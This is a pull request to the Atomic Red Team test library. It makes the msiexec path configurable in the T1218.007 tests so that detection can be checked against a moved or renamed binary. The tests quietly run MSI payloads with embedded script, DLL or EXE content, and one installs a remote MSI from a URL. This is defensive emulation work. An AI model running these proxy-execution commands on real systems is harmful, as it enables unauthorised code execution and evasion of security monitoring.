### PR TITLE
Update T1218.007.yaml

### DIFF
--- a/atomics/T1218.007/T1218.007.yaml
+++ b/atomics/T1218.007/T1218.007.yaml
@@ -12,6 +12,10 @@ atomic_tests:
       description: MSI file to execute
       type: Path
       default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi
+    msi_exe:
+      description: MSIExec File Path
+      type: Path
+      default: c:\windows\system32\msiexec.exe
     action:
       description: |
         Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -27,7 +31,7 @@ atomic_tests:
       Write-Host "You must provide your own MSI"
   executor:
     command: |
-      msiexec.exe /q /#{action} "#{msi_payload}"
+      #{msi_exe} /q /#{action} "#{msi_payload}"
     name: command_prompt
 - name: Msiexec.exe - Execute Local MSI file with embedded VBScript
   auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
@@ -40,6 +44,10 @@ atomic_tests:
       description: MSI file to execute
       type: Path
       default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi
+    msi_exe:
+      description: MSIExec File Path
+      type: Path
+      default: c:\windows\system32\msiexec.exe
     action:
       description: |
         Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -55,7 +63,7 @@ atomic_tests:
       Write-Host "You must provide your own MSI"
   executor:
     command: |
-      msiexec.exe /q /#{action} "#{msi_payload}"
+      #{msi_exe} /q /#{action} "#{msi_payload}"
     name: command_prompt
 - name: Msiexec.exe - Execute Local MSI file with an embedded DLL
   auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
@@ -68,6 +76,10 @@ atomic_tests:
       description: MSI file to execute
       type: Path
       default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi
+    msi_exe:
+      description: MSIExec File Path
+      type: Path
+      default: c:\windows\system32\msiexec.exe
     action:
       description: |
         Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -83,7 +95,7 @@ atomic_tests:
       Write-Host "You must provide your own MSI"
   executor:
     command: |
-      msiexec.exe /q /#{action} "#{msi_payload}"
+      #{msi_exe} /q /#{action} "#{msi_payload}"
     name: command_prompt
 - name: Msiexec.exe - Execute Local MSI file with an embedded EXE
   auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
@@ -96,6 +108,10 @@ atomic_tests:
       description: MSI file to execute
       type: Path
       default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi
+    msi_exe:
+      description: MSIExec File Path
+      type: Path
+      default: c:\windows\system32\msiexec.exe
     action:
       description: |
         Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.
@@ -111,7 +127,7 @@ atomic_tests:
       Write-Host "You must provide your own MSI"
   executor:
     command: |
-      msiexec.exe /q /#{action} "#{msi_payload}"
+      #{msi_exe} /q /#{action} "#{msi_payload}"
     name: command_prompt
 - name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
   auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
@@ -236,6 +252,10 @@ atomic_tests:
       description: DLL to execute that has an implemented DllRegisterServer function
       type: Path
       default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+    msi_exe:
+      description: MSIExec File Path
+      type: Path
+      default: c:\windows\system32\msiexec.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -246,7 +266,7 @@ atomic_tests:
       Write-Host "You must provide your own MSI"
   executor:
     command: |
-      msiexec.exe /y "#{dll_payload}"
+      #{msi_exe} /y "#{dll_payload}"
     name: command_prompt
 - name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
   auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
@@ -259,6 +279,10 @@ atomic_tests:
       description: DLL to execute that has an implemented DllUnregisterServer function
       type: Path
       default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll
+    msi_exe:
+      description: MSIExec File Path
+      type: Path
+      default: c:\windows\system32\msiexec.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -269,7 +293,7 @@ atomic_tests:
       Write-Host "You must provide your own MSI"
   executor:
     command: |
-      msiexec.exe /z "#{dll_payload}"
+      #{msi_exe} /z "#{dll_payload}"
     name: command_prompt
 - name: Msiexec.exe - Execute Remote MSI file
   auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
@@ -282,7 +306,11 @@ atomic_tests:
       description: MSI file to execute
       type: String
       default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi
+    msi_exe:
+      description: MSIExec File Path
+      type: Path
+      default: c:\windows\system32\msiexec.exe
   executor:
     command: |
-      msiexec.exe /q /i "#{msi_payload}"
+      #{msi_exe} /q /i "#{msi_payload}"
     name: command_prompt


### PR DESCRIPTION
Added stanza for msiexec.exe path on tests. This allows for the ability to move msiexec.exe to a new path, or rename, and run the same test. 

`#{msi_exe}`

![image](https://user-images.githubusercontent.com/5632822/174108859-f3bb3cc5-a10f-4bd6-bbd6-bddea0a43a44.png)

Confirmed operational via:
```
 copy-item C:\windows\System32\msiexec.exe C:\Temp\
```
![image](https://user-images.githubusercontent.com/5632822/174109319-9651d269-c8b1-4742-95ea-1141b8f70f0d.png)
